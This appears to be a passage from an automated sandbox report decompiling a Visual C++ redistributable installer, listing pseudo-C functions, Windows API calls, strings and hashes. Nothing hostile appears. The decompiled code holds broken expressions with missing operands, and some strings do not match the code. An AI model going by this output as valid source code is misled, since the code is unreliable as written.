                                                                          						E000B37D3(0x80004005, "cabextract.cpp", 0x37e, _t20);
                                                                          						_push("Failed to move to virtual file pointer.");
                                                                          						_push(_t20);
                                                                          						E000F012F();
                                                                          					}
                                                                          				}
                                                                          				return _t20;
                                                                          			}







                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000D077D,?,?,?), ref: 000D1177
                                                                          • GetLastError.KERNEL32(?,000D077D,?,?,?), ref: 000D1181
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move to virtual file pointer.$cabextract.cpp
                                                                          • API String ID: 2976181284-1626086099
                                                                          • Opcode ID: dccbf0cbe27795228b5a857d738c32f7e337a4fe313297c482d04cafb265aa16
                                                                          • Instruction ID: 4e89a5c19f815c54b19fbc12c2d49367f405d23373336976e6cee65db75eab44
                                                                          • Opcode Fuzzy Hash: dccbf0cbe27795228b5a857d738c32f7e337a4fe313297c482d04cafb265aa16
                                                                          • Instruction Fuzzy Hash: EA01F236640325BBE7211A669C04ED7FF99FF017A0B018226FE0896650DB358C10DAE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E000BD7CF(intOrPtr _a4) {
                                                                          				_Unknown_base(*)()* _t12;
                                                                          				int _t13;
                                                                          				signed int _t18;
                                                                          				void* _t19;
                                                                          				intOrPtr _t22;
                                                                          
                                                                          				_t22 = _a4;
                                                                          				_t19 = 0;
                                                                          				_t18 =  *(_t22 + 0x10);
                                                                          				if(_t18 != 0) {
                                                                          					 *((intOrPtr*)( *_t18 + 8))(_t18);
                                                                          					 *(_t22 + 0x10) =  *(_t22 + 0x10) & 0;
                                                                          				}
                                                                          				if( *(_t22 + 0xc) != _t19) {
                                                                          					_t12 = GetProcAddress( *(_t22 + 0xc), "BootstrapperApplicationDestroy");
                                                                          					if(_t12 != 0) {
                                                                          						 *_t12();
                                                                          					}
                                                                          					_t13 = FreeLibrary( *(_t22 + 0xc)); // executed
                                                                          					if(_t13 == 0) {
                                                                          						_t19 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					}
                                                                          					 *(_t22 + 0xc) =  *(_t22 + 0xc) & 0x00000000;
                                                                          				}
                                                                          				return _t19;
                                                                          			}









                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 000BD7F6
                                                                          • FreeLibrary.KERNELBASE(?,?,000B47D1,00000000,?,?,000B5386,?,?), ref: 000BD805
                                                                          • GetLastError.KERNEL32(?,000B47D1,00000000,?,?,000B5386,?,?), ref: 000BD80F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFreeLastLibraryProc
                                                                          • String ID: @Met$BootstrapperApplicationDestroy
                                                                          • API String ID: 1144718084-3300157853
                                                                          • Opcode ID: e6a9325ee65cfacce2ee5a81d20de70a8fd5ad99a25194c5d6216c2f9df5265c
                                                                          • Instruction ID: 078a2d31305504187c1c57ca5f69d11ba7bcb238618e6369219af1528b445036
                                                                          • Opcode Fuzzy Hash: e6a9325ee65cfacce2ee5a81d20de70a8fd5ad99a25194c5d6216c2f9df5265c
                                                                          • Instruction Fuzzy Hash: 6BF0F9362007019FE7205FA6DC08AA7F7E9BF80762B01C53EE566C6960EB75E814DF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 30%
                                                                          			E000CF086(intOrPtr _a4, long _a8) {
                                                                          				int _t5;
                                                                          				signed short _t7;
                                                                          				int _t13;
                                                                          
                                                                          				_t13 = 0;
                                                                          				_t5 = PostThreadMessageW( *(_a4 + 0x10), 0x9001, 0, _a8); // executed
                                                                          				if(_t5 == 0) {
                                                                          					_t7 = GetLastError();
                                                                          					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "EngineForApplication.cpp", 0x292, _t13);
                                                                          					_push("Failed to post plan message.");
                                                                          					_push(_t13);
                                                                          					E000F012F();
                                                                          				}
                                                                          				return _t13;
                                                                          			}







                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post plan message.
                                                                          • API String ID: 2609174426-3019743703
                                                                          • Opcode ID: adf96437d4fca1fbbd5445e7703b96d3dec2bd9275d0da47aeee7b9ce11f8e32
                                                                          • Instruction ID: 01e3a3c3d68f6606be914013063d7edb430b44c41f03bdd18f91899c9e4e35d5
                                                                          • Opcode Fuzzy Hash: adf96437d4fca1fbbd5445e7703b96d3dec2bd9275d0da47aeee7b9ce11f8e32
                                                                          • Instruction Fuzzy Hash: C3F030327843347BE7616AAA9C09E977BC9EF04BA0F014025FD48EA5A2DA658D00D6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 30%
                                                                          			E000CF194(intOrPtr _a4, int _a8) {
                                                                          				int _t5;
                                                                          				signed short _t7;
                                                                          				long _t13;
                                                                          
                                                                          				_t13 = 0;
                                                                          				_t5 = PostThreadMessageW( *(_a4 + 0x10), 0x9005, _a8, 0); // executed
                                                                          				if(_t5 == 0) {
                                                                          					_t7 = GetLastError();
                                                                          					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "EngineForApplication.cpp", 0x2c3, _t13);
                                                                          					_push("Failed to post shutdown message.");
                                                                          					_push(_t13);
                                                                          					E000F012F();
                                                                          				}
                                                                          				return _t13;
                                                                          			}







                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post shutdown message.
                                                                          • API String ID: 2609174426-1833910594
                                                                          • Opcode ID: ca303587bb133e74a0632b566df592a4f4a575dbdafffbe56b4d61c1b7895f10
                                                                          • Instruction ID: dd602f2dca9cc30ce9d1a4381a6071861ef2e11d07dee5425fbe91163a10c119
                                                                          • Opcode Fuzzy Hash: ca303587bb133e74a0632b566df592a4f4a575dbdafffbe56b4d61c1b7895f10
                                                                          • Instruction Fuzzy Hash: 49F037327453357BE7206AA99C09ED77BC9EF04B60F014025BD08E6591DA558D00D6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,00000000,?,000D145A,00000000,00000000,?,000BC121,00000000,?,?,000DAB88,?,00000000,?,?), ref: 000D0524
                                                                          • GetLastError.KERNEL32(?,000D145A,00000000,00000000,?,000BC121,00000000,?,?,000DAB88,?,00000000,?,?,?,00000000), ref: 000D052E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorEventLast
                                                                          • String ID: @Met$Failed to set begin operation event.$cabextract.cpp
                                                                          • API String ID: 3848097054-3980609822
                                                                          • Opcode ID: 8565f975bd412812488867d01c585c9bc70374ab9ef439f368fe4f6f2294924f
                                                                          • Instruction ID: 96db44b8bc2f6cabac85aa13a390222f0dff6cfadf7e212d233dbfb03351a641
                                                                          • Opcode Fuzzy Hash: 8565f975bd412812488867d01c585c9bc70374ab9ef439f368fe4f6f2294924f
                                                                          • Instruction Fuzzy Hash: 01F0A073A40B306BE720A6A9AC05BEB76D8DF047A1B010126FE09E7691EA559D0096E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 30%
                                                                          			E000CE978(intOrPtr _a4, long _a8) {
                                                                          				int _t5;
                                                                          				signed short _t7;
                                                                          				int _t13;
                                                                          
                                                                          				_t13 = 0;
                                                                          				_t5 = PostThreadMessageW( *(_a4 + 0x10), 0x9003, 0, _a8); // executed
                                                                          				if(_t5 == 0) {
                                                                          					_t7 = GetLastError();
                                                                          					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "EngineForApplication.cpp", 0x2b4, _t13);
                                                                          					_push("Failed to post apply message.");
                                                                          					_push(_t13);
                                                                          					E000F012F();
                                                                          				}
                                                                          				return _t13;
                                                                          			}







                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post apply message.
                                                                          • API String ID: 2609174426-2658443504
                                                                          • Opcode ID: 8f5550112253e25810e794a75696c7b356686d9e8897e309369b5e757d54c7c8
                                                                          • Instruction ID: e743dd9eaa8c53b7ecb19ede9a0a2b4d106ee78003b72962421307d6990b710f
                                                                          • Opcode Fuzzy Hash: 8f5550112253e25810e794a75696c7b356686d9e8897e309369b5e757d54c7c8
                                                                          • Instruction Fuzzy Hash: C0F037327443346BE72176A99C05E977BC9EF04BA0F014025BD08E6592D6658D10D6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000B37EA(void* __edx, intOrPtr _a4, struct HINSTANCE__** _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t15;
                                                                          				signed int _t20;
                                                                          				void* _t22;
                                                                          				struct HINSTANCE__* _t26;
                                                                          				signed short _t27;
                                                                          				void* _t29;
                                                                          				void* _t31;
                                                                          				struct HINSTANCE__** _t32;
                                                                          				void* _t33;
                                                                          				void* _t36;
                                                                          				intOrPtr _t37;
                                                                          				signed int _t42;
                                                                          
                                                                          				_t36 = __edx;
                                                                          				_t15 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t15 ^ _t42;
                                                                          				_t32 = _a8;
                                                                          				_t37 = _a12;
                                                                          				E000DF670(_t37,  &_v528, 0, 0x208);
                                                                          				_t38 = 0x104;
                                                                          				_t20 = GetSystemDirectoryW( &_v528, 0x104);
                                                                          				if(_t20 != 0) {
                                                                          					_t33 = 0x5c;
                                                                          					if(_t33 ==  *((intOrPtr*)(_t42 + _t20 * 2 - 0x20e))) {
                                                                          						L6:
                                                                          						_t22 = E000B36B4(_t33,  &_v528, _t38, _a4);
                                                                          						_t39 = _t22;
                                                                          						if(_t22 < 0) {
                                                                          							L10:
                                                                          							return E000DDE36(_t32, _v8 ^ _t42, _t36, _t37, _t39);
                                                                          						}
                                                                          						_t26 = LoadLibraryW( &_v528); // executed
                                                                          						 *_t32 = _t26;
                                                                          						if(_t26 == 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						if(_t37 != 0) {
                                                                          							_t29 = E000B21A5(_t37,  &_v528, 0x104); // executed
                                                                          							_t39 = _t29;
                                                                          						}
                                                                          						goto L10;
                                                                          					}
                                                                          					_t31 = E000B3665(_t33,  &_v528, 0x104, "\\", 1);
                                                                          					_t39 = _t31;
                                                                          					if(_t31 < 0) {
                                                                          						goto L10;
                                                                          					} else {
                                                                          						_t38 = 0x104;
                                                                          						goto L6;
                                                                          					}
                                                                          				}
                                                                          				L1:
                                                                          				_t27 = GetLastError();
                                                                          				_t39 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          				if(( <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000) >= 0) {
                                                                          					_t39 = 0x80004005;
                                                                          				}
                                                                          				goto L10;
                                                                          			}






















                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 000B3829
                                                                          • GetLastError.KERNEL32 ref: 000B3833
                                                                          • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 000B389B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                          • String ID: @Met
                                                                          • API String ID: 1230559179-2381362037
                                                                          • Opcode ID: 64fe028a5adf4af5a3c3126b64e24fc256efe02ffeaff4b2432e211c2caacc6a
                                                                          • Instruction ID: 263460203e0dbb1a27bb0f093377457721adc6acba4d12817ec995ecd7f18033
                                                                          • Opcode Fuzzy Hash: 64fe028a5adf4af5a3c3126b64e24fc256efe02ffeaff4b2432e211c2caacc6a
                                                                          • Instruction Fuzzy Hash: B821AAB2D0132967EB20AB64DC45FDAB7ACAF04710F254165BE14E7241EA35DE448BE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 34%
                                                                          			E000D88CF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t26;
                                                                          				void* _t28;
                                                                          				void* _t36;
                                                                          				intOrPtr* _t44;
                                                                          				void* _t47;
                                                                          
                                                                          				_t39 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_t26 = E000F0E3F(_a8, _a12, 0x20019,  &_v8); // executed
                                                                          				if(_t26 >= 0) {
                                                                          					_t28 = E000D8458(_v8, _a16,  &_v12); // executed
                                                                          					if(_t28 < 0 || _v12 == 0) {
                                                                          						_t47 = 0x80070490;
                                                                          					} else {
                                                                          						_t44 = _a20;
                                                                          						_t47 = E000B38F6( *(_t44 + 4) + 1, _t39, _t44,  *(_t44 + 4) + 1, 0xf8, 5);
                                                                          						if(_t47 >= 0) {
                                                                          							_t36 = E000D899C(_t39, _a12, _v8, _a4, _v12,  *(_t44 + 4) * 0xf8 +  *_t44); // executed
                                                                          							_t47 = _t36;
                                                                          							if(_t47 >= 0) {
                                                                          								 *(_t44 + 4) =  *(_t44 + 4) + 1;
                                                                          							} else {
                                                                          								_push(_a12);
                                                                          								_push("Failed to initialize package from related bundle id: %ls");
                                                                          								goto L2;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to ensure there is space for related bundles.");
                                                                          							_push(_t47);
                                                                          							E000F012F();
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push(_a12);
                                                                          					_push("Failed to open uninstall key for potential related bundle: %ls");
                                                                          					L2:
                                                                          					_push(_t47);
                                                                          					E000F012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8); // executed
                                                                          				}
                                                                          				return _t47;
                                                                          			}











                                                                          APIs
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          • RegCloseKey.KERNELBASE(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,000D8C14,00000000,00000000), ref: 000D898C
                                                                          Strings
                                                                          • Failed to initialize package from related bundle id: %ls, xrefs: 000D8972
                                                                          • Failed to ensure there is space for related bundles., xrefs: 000D893F
                                                                          • Failed to open uninstall key for potential related bundle: %ls, xrefs: 000D88FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                          • API String ID: 47109696-1717420724
                                                                          • Opcode ID: ec20cf598f483025189c68a91a9d86fd7c0742fc136198271e9f7bd78d3b5be4
                                                                          • Instruction ID: 12123efdfbd27f15b1e00d41899a96e0526fdcfc80b0c76fbbde9072da889546
                                                                          • Opcode Fuzzy Hash: ec20cf598f483025189c68a91a9d86fd7c0742fc136198271e9f7bd78d3b5be4
                                                                          • Instruction Fuzzy Hash: 53217432940319BBDB129A84CC15BFEBB78FB00710F188156F94066251DB719D20EBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000C3955(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				void* _t12;
                                                                          				signed short* _t13;
                                                                          				signed int* _t21;
                                                                          				signed short* _t22;
                                                                          				void* _t24;
                                                                          				void* _t26;
                                                                          				void* _t27;
                                                                          				void* _t28;
                                                                          				signed int _t30;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_t12 = E000F0E3F(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", 0x20019,  &_v8); // executed
                                                                          				if(_t12 < 0 || E000F0F6E(_v8, L"Logging",  &_v12) < 0) {
                                                                          					_t13 = _v12;
                                                                          				} else {
                                                                          					_t13 = _v12;
                                                                          					_t22 = _t13;
                                                                          					if( *_t13 != 0) {
                                                                          						_t21 = _a4;
                                                                          						do {
                                                                          							_t30 =  *_t22 & 0x0000ffff;
                                                                          							_t24 = 0x76;
                                                                          							if(_t24 == _t30) {
                                                                          								L9:
                                                                          								 *_t21 =  *_t21 | 0x00000002;
                                                                          							} else {
                                                                          								_t26 = 0x56;
                                                                          								if(_t26 == _t30) {
                                                                          									goto L9;
                                                                          								} else {
                                                                          									_t27 = 0x78;
                                                                          									if(_t27 == _t30) {
                                                                          										L8:
                                                                          										 *_t21 =  *_t21 | 0x00000004;
                                                                          									} else {
                                                                          										_t28 = 0x58;
                                                                          										if(_t28 == _t30) {
                                                                          											goto L8;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							_t22 =  &(_t22[1]);
                                                                          						} while ( *_t22 != 0);
                                                                          					}
                                                                          				}
                                                                          				if(_t13 != 0) {
                                                                          					_t13 = E000F54EF(_t13);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					return RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t13;
                                                                          			}















                                                                          APIs
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,000C3E61,feclient.dll,?,00000000,?,?,?,000B4A0C), ref: 000C39F1
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,?), ref: 000F0FE4
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 000F101F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                          • API String ID: 1586453840-3596319545
                                                                          • Opcode ID: 3703ed82623b4b83a3d9dde9c6c9393ab95d196d285619d916b968dd3e470fd5
                                                                          • Instruction ID: ca17c9f0742e022bd1ff4e9f33aa40e35d16f5b63b40e5cd58e25d9e6948a40a
                                                                          • Opcode Fuzzy Hash: 3703ed82623b4b83a3d9dde9c6c9393ab95d196d285619d916b968dd3e470fd5
                                                                          • Instruction Fuzzy Hash: 3611B633B50208BBDB219B95DD47FBEB7B8EB00B41F50806AE50197090D6F15F81E750
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 89%
                                                                          			E000F47D3(void* __ecx, void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                          				intOrPtr _v8;
                                                                          				void* _v12;
                                                                          				int _t11;
                                                                          				intOrPtr* _t12;
                                                                          				void* _t21;
                                                                          
                                                                          				_push(_a20);
                                                                          				_t21 = 0;
                                                                          				_t11 = SetFilePointerEx(_a4, _a8, _a12,  &_v12); // executed
                                                                          				if(_t11 != 0) {
                                                                          					_t12 = _a16;
                                                                          					if(_t12 != 0) {
                                                                          						 *_t12 = _v12;
                                                                          						 *((intOrPtr*)(_t12 + 4)) = _v8;
                                                                          					}
                                                                          				} else {
                                                                          					_t25 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "fileutil.cpp", 0x20a, _t21);
                                                                          				}
                                                                          				return _t21;
                                                                          			}









                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,?,00000000,00000000,00000000,?,000F6219,?,?,00000000,00000000,00000000,00000001), ref: 000F47EB
                                                                          • GetLastError.KERNEL32(?,000F6219,?,?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,000F5AC5,?,?,?), ref: 000F47F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 2976181284-2299628883
                                                                          • Opcode ID: e7a027a22b501216edf91b4da98c2ff0c789ef4634b40b9d25bf9f4f6af85c13
                                                                          • Instruction ID: 7dfb20f9647424ae98023ccc326882b68fe2839accea8b82e6e4cc1f2908c984
                                                                          • Opcode Fuzzy Hash: e7a027a22b501216edf91b4da98c2ff0c789ef4634b40b9d25bf9f4f6af85c13
                                                                          • Instruction Fuzzy Hash: 48F01D71A00259ABAB249F95DC05DBB7BE8EF04790B014169BD0597650DA31DD11EAE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000B3999(void* _a4) {
                                                                          				char _t3;
                                                                          				long _t6;
                                                                          
                                                                          				_t6 = 0;
                                                                          				_t3 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                          				if(_t3 == 0) {
                                                                          					_t6 =  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
                                                                          				}
                                                                          				return _t6;
                                                                          			}






                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000,?,000B3B34,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B39A3
                                                                          • RtlFreeHeap.NTDLL(00000000,?,000B3B34,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511,?,?), ref: 000B39AA
